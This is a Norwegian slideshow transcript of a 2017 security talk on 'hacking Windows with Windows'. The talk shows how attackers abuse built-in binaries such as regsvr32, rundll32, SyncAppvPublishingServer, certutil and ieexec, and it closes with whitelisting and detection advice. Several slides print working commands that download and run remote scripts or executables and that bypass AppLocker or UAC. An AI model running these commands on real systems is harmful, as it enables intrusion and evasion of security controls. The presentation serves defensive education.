Successfully reported this slideshow.
We use your LinkedIn profile and activity data to personalize ads and to show you more relevant ads. You can change your ad preferences anytime.

Hacke windows med windows - avanserte angrep

361 views

Published on

Foredrag holdt for Office 365 User Group I Agder 14. september 2017

Published in: Technology
  • Be the first to comment

  • Be the first to like this

Hacke windows med windows - avanserte angrep

  1. 1. Hacke Windows med Windows – Avanserte angrep MTUG 10.09.2017
  2. 2. WHOAMI • Geek/Pentester/Security researcher/IT-Pro/MVP/Speaker • Jobbet med IT siden 2000 • Første MCP når jeg var 16 • Work @ Advania – Chief Technical Architect • Gift/barn/hund • Blog: http://oddvar.moe • Twitter: @oddvarmoe
  3. 3. Angrep – Hvordan skaffe seg første tilgang • Tradisjonelt angrep • Sende mail • Link • Vedlegg • Phishing side • Ekstern server • OWA • ADFS • Skype • 3.parts
  4. 4. Trenger du flere eksempler? • https://onedrive.live.com/?authkey=%21ADev0bfQMNxv504&cid=C9 6A3EEDCE316E4C&id=C96A3EEDCE316E4C%21114&parId=C96A3EED CE316E4C%21109&o=OneUp
  5. 5. Call to Action!
  6. 6. Call to Action! • Innstilling i Office (2013/2016)
  7. 7. Hva er bak enable content? • Her kommer det interessante • Hva gjør de? • Vi skal se på en del eksempler • Real attacks • «Future attacks»
  8. 8. Hva mener du med «Hacke Windows med Windows» • Angripere har skiftet fokus • Benytter Windows funksjonalitet for å utføre angrep • Misbruker godkjente verktøy • Ikke lengere malware.exe
  9. 9. REGSVR32.exe • regsvr32 /s /n /u /i:http://example.com/file.sct scrobj.dll • Proxy aware
  10. 10. REGSVR32.exe • Kalkulator: • regsvr32 /s /n /u /i:https://gist.githubusercontent.com/api0cradle/1409e8f00ae51dd6 b736b30947a3d0c2/raw/ef22366bfb62a2ddea8c5e321d3ce2f4c95d2 a66/Backdoor-Minimalist.sct scrobj.dll
  11. 11. rundll32.exe • rundll32.exe javascript:"..mshtml,RunHTMLApplication ";alert('User%20Group%20Agder'); • (Blir nå tatt av Windows Defender) • Detaljert forklaring: https://stackoverflow.com/questions/25131484/rundll32-exe- javascript
  12. 12. Rundll32.exe • Kalkulator: • rundll32.exe javascript:"..mshtml.dll,RunHTMLApplication ";eval("w=new%20ActiveXObject("WScript.Shell");w.run("calc");w indow.close()");
  13. 13. SyncAppvPublishingServer.exe • SyncAppvPublishingServer.exe "n;((New-Object Net.WebClient).DownloadString('http://some.url/script.ps1') | IEX • Kommando injection feil
  14. 14. SyncAppvPublishingServer.exe • Kalkulator: • SyncAppvPublishingServer.exe "n;(calc) • cmd.exe /c cscript.exe SyncAppVPublishingServer.vbs ".; Start-Process rundll32.exe 'shell32.dll,ShellExec_RunDLL calc.exe'" • Bevis på Powershell: • SyncAppvPublishingServer.exe "n;(get-service | out-gridview)
  15. 15. Certutil.exe • certutil.exe -urlcache -split -f http://www.7-zip.org/a/7z1701.exe 7zip.exe • certutil.exe /decode base64kodetfil.txt x64.dll • certutil -Class scrobj.dll
  16. 16. Noen andre uten demo • msbuild.exe pshell.xml • regsvcs.exe /U regsvcs.dll regsvcs.exe regsvcs.dll • regasm.exe /U regsvcs.dll regasm.exe regsvcs.dll • InstallUtil.exe /logfile= /LogToConsole=false /U MYDLL.dll • msxsl.exe customers.xml script.xsl
  17. 17. Min research • BGINFO.exe bginfo.exe 10.10.10.10webdavbginfo.bgi /popup /nolicprompt Video: https://youtu.be/OiKhgSxWKUM • CMSTP.exe UAC Bypass og DLL Loading https://msitpros.com/wp- content/uploads/2017/08/WebDavDLLLoadBlog.gif
  18. 18. Min research • CVE-2017-8625 • hh.exe /? (Hva gjør denne tror du?) • Device Guard bypass • https://msitpros.com/wp-content/uploads/2017/08/CVE-2017- 8625.gif
  19. 19. Kode i kode
  20. 20. EXE filer som kan starte andre EXE filer • Eksempler: • scriptrunner.exe -appvscript calc.exe • forfiles /p c:windowssystem32 /m notepad.exe /c calc.exe • ieexec.exe http://x.x.x.x:8080/bypass.exe (.NET exe) • bash.exe -c calc.exe (Linux i Windows)
  21. 21. Proxy • netsh interface portproxy add v4tov4 listenport=9999 listenaddress=0.0.0.0 connectport=445 connectaddress=192.168.1.112
  22. 22. Hva burde du gjøre? • Application whitelisting • Device Guard • AppLocker • Husk AppLocker bypass listen min: • https://github.com/api0cradle/UltimateAppLockerByPassList • Implementer deteksjon (Splunk / WDATP / ATA)
  23. 23. SELV OM DU KAN RANE EN BANK MED PENN OG PAPIR, BETYR DET IKKE AT DU IKKE SKAL HA ET HVELV!
  24. 24. SHAMELESS PLUG!
  25. 25. Takk for meg!

×